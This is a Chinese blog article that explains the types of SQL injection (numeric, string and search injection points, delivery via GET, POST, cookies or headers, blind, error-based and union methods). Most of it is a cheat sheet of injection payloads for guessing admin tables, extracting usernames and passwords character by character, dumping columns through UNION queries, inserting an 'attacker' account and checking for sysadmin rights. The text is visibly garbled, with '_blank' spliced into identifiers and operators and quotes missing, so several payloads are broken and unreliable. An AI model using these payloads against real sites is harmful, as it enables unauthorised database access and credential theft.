sql注入语句有三种分别是什么

41次阅读
没有评论

共计 3814 个字符,预计需要花费 10 分钟才能阅读完成。

自动写代码机器人,免费开通

这篇文章主要介绍 sql 注入语句有三种分别是什么,文中介绍的非常详细,具有一定的参考价值,感兴趣的小伙伴们一定要看完!

sql 注入语句有三种,分别是:1、数字型注入点,语句如“select * from 表名 where id=1 and 1=1”;2、字符型注入点,语句如“select * from 表名 where name…”;3、搜索型注入点。

sql 注入常用语句

SQL 注入 1. 什么是 sql 注入

通过把 SQL 命令插入到 Web 表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的 SQL 命令。

2. sql 注入类型按照注入点类型来分类(1)数字型注入点

许多网页链接有类似的结构 http://xxx.com/users.php?id=1 基于此种形式的注入,一般被叫做数字型注入点,缘由是其注入点 id 类型为数字,在大多数的网页中,诸如 查看用户个人信息,查看文章等,大都会使用这种形式的结构传递 id 等信息,交给后端,查询出数据库中对应的信息,返回给前台。这一类的 SQL 语句原型大概为 select * from 表名 where id=1 若存在注入,我们可以构造出类似与如下的 sql 注入语句进行爆破:select * from 表名 where id=1 and 1=1

(2)字符型注入点

网页链接有类似的结构 http://xxx.com/users.php?name=admin 这种形式,其注入点 name 类型为字符类型,所以叫字符型注入点。这一类的 SQL 语句原型大概为 select * from 表名 where name= admin 值得注意的是这里相比于数字型注入类型的 sql 语句原型多了引号,可以是单引号或者是双引号。若存在注入,我们可以构造出类似与如下的 sql 注入语句进行爆破:select * from 表名 where name= admin and 1=1 我们需要将这些烦人的引号给处理掉。

(3)搜索型注入点

这是一类特殊的注入类型。这类注入主要是指在进行数据搜索时没过滤搜索参数,一般在链接地址中有 keyword= 关键字 有的不显示在的链接地址里面,而是直接通过搜索框表单提交。此类注入点提交的 SQL 语句,其原形大致为:select * from 表名 where 字段 like % 关键字 % 若存在注入,我们可以构造出类似与如下的 sql 注入语句进行爆破:select * from 表名 where 字段 like % 测试 % and %1% = %1%

按照数据提交的方式来分类

(1)GET 注入

提交数据的方式是 GET , 注入点的位置在 GET 参数部分。比如有这样的一个链接 http://xxx.com/news.php?id=1 , id 是注入点。

(2)POST 注入

使用 POST 方式提交数据,注入点位置在 POST 数据部分,常发生在表单中。

(3)Cookie 注入

HTTP 请求的时候会带上客户端的 Cookie, 注入点存在 Cookie 当中的某个字段中。

(4)HTTP 头部注入

注入点在 HTTP 请求头部的某个字段中。比如存在 User-Agent 字段中。严格讲的话,Cookie 其实应该也是算头部注入的一种形式。因为在 HTTP 请求的时候,Cookie 是头部的一个字段。

按照执行效果来分类

(1)基于布尔的盲注

即可以根据返回页面判断条件真假的注入。

(2)基于时间的盲注

即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。

(3)基于报错注入

即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。

单引号

双引号

基于数字型注入

(4)联合查询注入

可以使用 union 的情况下的注入。

常用语句

1. 判断有无注入点  
; and 1=1 and 1=2
2. 猜表一般的表的名称无非是 admin adminuser user pass password  等.. 
and 0 (select count(*) from *) 
and 0 (select count(*) from admin) --- 判断是否存在 admin 这张表
3. 猜帐号数目   如果遇到 0   返回正确页面  1 返回错误页面说明帐号数目就是 1 个  
and 0 (select count(*) from admin) 
and 1 (select count(*) from admin)
4. 猜解字段名称   在 len( )  括号里面加上我们想到的字段名称. 
and 1=(select count(*) from admin where len(*) 0)-- 
and 1=(select count(*) from admin where len(用户字段名称 name) 0) 
and 1=(select count(*) from admin where len(_blank 密码字段名称 password) 0)
5. 猜解各个字段的长度   猜解长度就是把 0 变换   直到返回正确页面为止  
and 1=(select count(*) from admin where len(*) 0) 
and 1=(select count(*) from admin where len(name) 6)  错误  
and 1=(select count(*) from admin where len(name) 5)  正确   长度是 6  
and 1=(select count(*) from admin where len(name)=6)  正确
and 1=(select count(*) from admin where len(password) 11)  正确  
and 1=(select count(*) from admin where len(password) 12)  错误   长度是 12 
and 1=(select count(*) from admin where len(password)=12)  正确
6. 猜解字符  
and 1=(select count(*) from admin where left(name,1)=a) --- 猜解用户帐号的第一位  
and 1=(select count(*) from admin where left(name,2)=ab)--- 猜解用户帐号的第二位  
就这样一次加一个字符这样猜, 猜到够你刚才猜出来的多少位了就对了, 帐号就算出来了  
and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) -- 
这个查询语句可以猜解中文的用户和_blank 密码. 只要把后面的数字换成中文的 ASSIC 码就 OK. 最后把结果再转换成字符.
group by users.id having 1=1-- 
group by users.id, users.username, users.password, users.privs having 1=1-- 
; insert into users values( 666, attacker, foobar, 0xffff )--
UNION SELECT TOP 1 COLUMN_blank _NAME FROM INFORMATION_blank _SCHEMA.COLUMNS
WHERE TABLE_blank _NAME=logintable- 
UNION SELECT TOP 1 COLUMN_blank _NAME FROM INFORMATION_blank _SCHEMA.COLUMNS
WHERE TABLE_blank _NAME=logintable WHERE COLUMN_blank _NAME NOT IN (login_blank
 _id)- 
UNION SELECT TOP 1 COLUMN_blank _NAME FROM INFORMATION_blank _SCHEMA.COLUMNS
WHERE TABLE_blank _NAME=logintable WHERE COLUMN_blank _NAME NOT IN (login_blank
 _id,login_blank _name)- 
UNION SELECT TOP 1 login_blank _name FROM logintable- 
UNION SELECT TOP 1 password FROM logintable where login_blank _name=Rahul--
看_blank 服务器打的补丁 = 出错了打了 SP4 补丁  
and 1=(select @@VERSION)--
看_blank 数据库连接账号的权限,返回正常,证明是_blank 服务器角色 sysadmin 权限。 
and 1=(SELECT IS_blank _SRVROLEMEMBER(sysadmin))--
判断连接_blank 数据库帐号。(采用 SA 账号连接   返回正常 = 证明了连接账号是 SA) 
and sa=(SELECT System_blank _user)-- 
and user_blank _name()=dbo-- 
and 0 (select user_blank _name()--

以上是“sql 注入语句有三种分别是什么”这篇文章的所有内容,感谢各位的阅读!希望分享的内容对大家有帮助,更多相关知识,欢迎关注丸趣 TV 行业资讯频道!

向 AI 问一下细节

正文完
 
丸趣
版权声明:本站原创文章,由 丸趣 2023-12-04发表,共计3814字。
转载说明:除特殊说明外本站除技术相关以外文章皆由网络搜集发布,转载请注明出处。
评论(没有评论)